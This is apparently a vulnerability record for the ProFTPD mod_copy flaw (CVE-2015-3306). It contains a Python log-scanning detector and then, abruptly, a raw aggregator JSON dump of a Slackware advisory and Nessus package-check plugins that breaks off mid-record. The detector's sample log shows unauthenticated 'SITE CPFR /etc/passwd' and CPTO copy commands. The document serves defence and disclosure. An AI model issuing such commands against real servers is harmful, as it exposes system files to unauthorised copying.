Added: 05/29/2015
CVE: [CVE-2015-3306](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306>)
BID: [74238](<http://www.securityfocus.com/bid/74238>)
OSVDB: [120834](<http://www.osvdb.org/120834>)
### Background
[ProFTPD](<http://www.proftpd.org/>) is free FTP Server software for Unix and Linux platforms.
### Problem
The mod_copy extension, if enabled in ProFTPD, allows unauthenticated attackers to read and write arbitrary files using the `SITE CPFR` and `SITE CPTO` commands. This can lead to arbitrary command execution if the system also runs a web server supporting PHP.
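The following detection sketch is an added example, not SAINT's or ProFTPD's code. It scans a ProFTPD `ExtendedLog` for `SITE CPFR`/`SITE CPTO` commands issued before login and pairs them per client. It assumes the log uses the `%h %l %u %t "%r" %s %b` LogFormat with `-` in the user field for sessions that have not logged in; the function and class names are hypothetical and the sample lines are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Assumed LogFormat: %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<cmd>[^"]*)" (?P<code>\d{3}|-) (?P<bytes>\S+)$'
)
# FTP commands are case-insensitive, so "site cpfr" must match too.
SITE_RE = re.compile(r'^SITE\s+(CPFR|CPTO)\s+(.+)$', re.IGNORECASE)


@dataclass
class Finding:
    host: str
    timestamp: str
    source: Optional[str]       # path given to SITE CPFR, if seen
    destination: Optional[str]  # path given to SITE CPTO, if seen
    status: str                 # "copied", "refused" or "source-accepted"


def find_unauthenticated_copies(log_text: str) -> List[Finding]:
    """Report mod_copy commands sent by clients that had not logged in."""
    pending = {}  # host -> (timestamp, source) of an accepted pre-login CPFR
    findings: List[Finding] = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # not in the assumed format
        site = SITE_RE.match(m["cmd"].strip())
        if not site:
            continue
        host, ts, code = m["host"], m["ts"], m["code"]
        if m["user"] != "-":
            # Logged-in session: mod_copy use is permitted, not this issue.
            pending.pop(host, None)
            continue
        verb, path = site.group(1).upper(), site.group(2).strip()
        if verb == "CPFR":
            if code == "350":
                pending[host] = (ts, path)
            else:
                findings.append(Finding(host, ts, path, None, "refused"))
        else:  # CPTO
            prev = pending.pop(host, None)
            source = prev[1] if prev else None
            status = "copied" if code == "250" else "refused"
            findings.append(Finding(host, ts, source, path, status))
    # A pre-login CPFR that was accepted but never followed by CPTO still
    # shows that the server honours mod_copy without authentication.
    for host, (ts, path) in pending.items():
        findings.append(Finding(host, ts, path, None, "source-accepted"))
    return findings


# Constructed sample log (documentation addresses, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 UNKNOWN - [29/May/2015:10:14:02 +0000] "SITE CPFR /etc/passwd" 350 -
198.51.100.4 UNKNOWN alice [29/May/2015:10:14:03 +0000] "SITE CPFR /home/alice/a.txt" 350 -
203.0.113.7 UNKNOWN - [29/May/2015:10:14:04 +0000] "site cpto /tmp/passwd.copy" 250 -
198.51.100.4 UNKNOWN alice [29/May/2015:10:14:05 +0000] "SITE CPTO /home/alice/b.txt" 250 -
192.0.2.9 UNKNOWN - [29/May/2015:10:15:00 +0000] "SITE CPFR /etc/passwd" 530 -
192.0.2.9 UNKNOWN - [29/May/2015:10:15:10 +0000] "USER anonymous" 331 -
"""

if __name__ == "__main__":
    for f in find_unauthenticated_copies(SAMPLE_LOG):
        print(f)
```

Pairing is by client address only, so sessions interleaved from behind one NAT address can be mismatched; a "copied" finding should be followed up by checking the destination path on disk.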
### Resolution
[Upgrade](<ftp://ftp.proftpd.org/distrib/source/>) to ProFTPD 1.3.5a or 1.3.6rc1 or higher, or install a package update from your Linux vendor.
### References
<http://bugs.proftpd.org/show_bug.cgi?id=4169>
### Limitations
The exploit works on ProFTPD 1.3.5 and requires the mod_copy module to be enabled.
The target must also run a web server supporting PHP in order for the exploit to succeed.
### Platforms
Linux
### Record metadata
Title: ProFTPD mod_copy command execution
Reporter: SAINT Corporation
Published: 2015-05-29
Modified: 2015-05-29
CVSS v2: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Source: <http://download.saintcorporation.com/cgi-bin/exploit_info/proftpd_mod_copy>
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"proftpd\", rpm:\"proftpd~1.3.4e~3.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:58", "description": "\r\n\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[slackware-security] proftpd (SSA:2015-111-12)\r\n\r\nNew proftpd packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\r\nand -current to fix a security issue.\r\n\r\n\r\nHere are the details from the Slackware 14.1 ChangeLog:\r\n+--------------------------+\r\npatches/packages/proftpd-1.3.4e-i486-1_slack14.1.txz: Upgraded.\r\n Patched an issue where mod_copy allowed unauthenticated copying\r\n of files via SITE CPFR/CPTO.\r\n For more information, see:\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306\r\n (* Security fix *)\r\n+--------------------------+\r\n\r\n\r\nWhere to find the new packages:\r\n+-----------------------------+\r\n\r\nThanks to the friendly folks at the OSU Open Source Lab\r\n(http://osuosl.org) for donating FTP and rsync hosting\r\nto the Slackware project! 
\r\n\r\nAlso see the "Get Slack" section on http://slackware.com for\r\nadditional mirror sites near you.\r\n\r\nUpdated package for Slackware 13.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/proftpd-1.3.4e-i486-1_slack13.0.txz\r\n\r\nUpdated package for Slackware x86_64 13.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/proftpd-1.3.4e-x86_64-1_slack13.0.txz\r\n\r\nUpdated package for Slackware 13.1:\r\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/proftpd-1.3.4e-i486-1_slack13.1.txz\r\n\r\nUpdated package for Slackware x86_64 13.1:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/proftpd-1.3.4e-x86_64-1_slack13.1.txz\r\n\r\nUpdated package for Slackware 13.37:\r\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/proftpd-1.3.4e-i486-1_slack13.37.txz\r\n\r\nUpdated package for Slackware x86_64 13.37:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/proftpd-1.3.4e-x86_64-1_slack13.37.txz\r\n\r\nUpdated package for Slackware 14.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/proftpd-1.3.4e-i486-1_slack14.0.txz\r\n\r\nUpdated package for Slackware x86_64 14.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/proftpd-1.3.4e-x86_64-1_slack14.0.txz\r\n\r\nUpdated package for Slackware 14.1:\r\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/proftpd-1.3.4e-i486-1_slack14.1.txz\r\n\r\nUpdated package for Slackware x86_64 14.1:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/proftpd-1.3.4e-x86_64-1_slack14.1.txz\r\n\r\nUpdated package for Slackware -current:\r\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/proftpd-1.3.5-i486-1.txz\r\n\r\nUpdated package for Slackware x86_64 
-current:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/proftpd-1.3.5-x86_64-1.txz\r\n\r\n\r\nInstallation instructions:\r\n+------------------------+\r\n\r\nUpgrade the package as root:\r\n# upgradepkg proftpd-1.3.4e-i486-1_slack14.1.txz\r\n\r\n\r\n+-----+\r\n\r\nSlackware Linux Security Team\r\nhttp://slackware.com/gpg-key\r\nsecurity@slackware.com\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niEYEARECAAYFAlU2zZYACgkQakRjwEAQIjMb/QCeORDbcU2ZWwaQN9LFatgaCtom\r\nV7YAoJV8VmbN9g5FVTlGSGQxcEamiP5W\r\n=n5sz\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2015-05-05T00:00:00", "title": "[slackware-security] proftpd (SSA:2015-111-12)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-05T00:00:00", "id": "SECURITYVULNS:DOC:32007", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32007", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:10:17", "description": "Unauthorized files copy via mod_copy.", "edition": 2, "cvss3": {}, "published": "2015-05-05T00:00:00", "title": "ProFTPD unauthorized files access", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2015-05-05T00:00:00", "id": "SECURITYVULNS:VULN:14450", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14450", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2022-06-16T14:47:05", "description": "ProFTPd development team reports :\n\nVadim Melihow reported a critical issue with proftpd installations that use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands to be used by *unauthenticated clients*.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-21T00:00:00", "type": "nessus", "title": "FreeBSD : proftpd -- arbitrary code execution vulnerability with chroot 
(d0034536-ff24-11e4-a072-d050996490d0)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:proftpd", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_D0034536FF2411E4A072D050996490D0.NASL", "href": "https://www.tenable.com/plugins/nessus/83752", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83752);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-3306\");\n\n script_name(english:\"FreeBSD : proftpd -- arbitrary code execution vulnerability with chroot (d0034536-ff24-11e4-a072-d050996490d0)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ProFTPd development team reports :\n\nVadim Melihow reported a critical issue with proftpd installations\nthat use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy\nallows these commands to be used by *unauthenticated clients*.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.proftpd.org/show_bug.cgi?id=4169\"\n );\n # https://vuxml.freebsd.org/freebsd/d0034536-ff24-11e4-a072-d050996490d0.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a3da31e8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ProFTPD 1.3.5 Mod_Copy Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:proftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"proftpd<1.3.5_7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:44:22", "description": "New proftpd packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue.", "cvss3": {"score": null, "vector": null}, "published": "2015-04-22T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : proftpd (SSA:2015-111-12)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:proftpd", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2015-111-12.NASL", "href": "https://www.tenable.com/plugins/nessus/82925", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2015-111-12. 
The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82925);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-3306\");\n script_xref(name:\"SSA\", value:\"2015-111-12\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : proftpd (SSA:2015-111-12)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New proftpd packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.503863\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?26b1069e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected proftpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ProFTPD 1.3.5 Mod_Copy Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:proftpd\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", 
pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"proftpd\", pkgver:\"1.3.4e\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"proftpd\", pkgver:\"1.3.5\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"proftpd\", pkgver:\"1.3.5\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:47:05", "description": "Vadim Melihow reported a critical issue with proftpd installations that use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands to be used by unauthenticated clients\n\nUpstream report: http://bugs.proftpd.org/show_bug.cgi?id=4169\n\nNote that mod_copy is not loaded/enabled by default in the Fedora package.\n\nNote that Tenable Network Security has extracted the 
preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-11T00:00:00", "type": "nessus", "title": "Fedora 21 : proftpd-1.3.5-5.fc21 (2015-7086)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:proftpd", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2015-7086.NASL", "href": "https://www.tenable.com/plugins/nessus/83323", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-7086.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83323);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-3306\");\n script_xref(name:\"FEDORA\", value:\"2015-7086\");\n\n script_name(english:\"Fedora 21 : proftpd-1.3.5-5.fc21 (2015-7086)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vadim Melihow reported a critical issue with proftpd installations\nthat use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy\nallows these commands to be used by unauthenticated clients\n\nUpstream report: http://bugs.proftpd.org/show_bug.cgi?id=4169\n\nNote that mod_copy is not loaded/enabled by default in the Fedora\npackage.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.proftpd.org/show_bug.cgi?id=4169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1212386\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-May/157581.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?86aa97d0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected proftpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ProFTPD 1.3.5 Mod_Copy Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:proftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", 
\"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"proftpd-1.3.5-5.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"proftpd\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:47:48", "description": "Vadim Melihow discovered that in proftpd-dfsg, an FTP server, the mod_copy module allowed unauthenticated users to copy files around on the server, and possibly to execute arbitrary code.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-20T00:00:00", "type": "nessus", "title": "Debian DSA-3263-1 : proftpd-dfsg - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3306"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:proftpd-dfsg", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:8.0"], "id": 
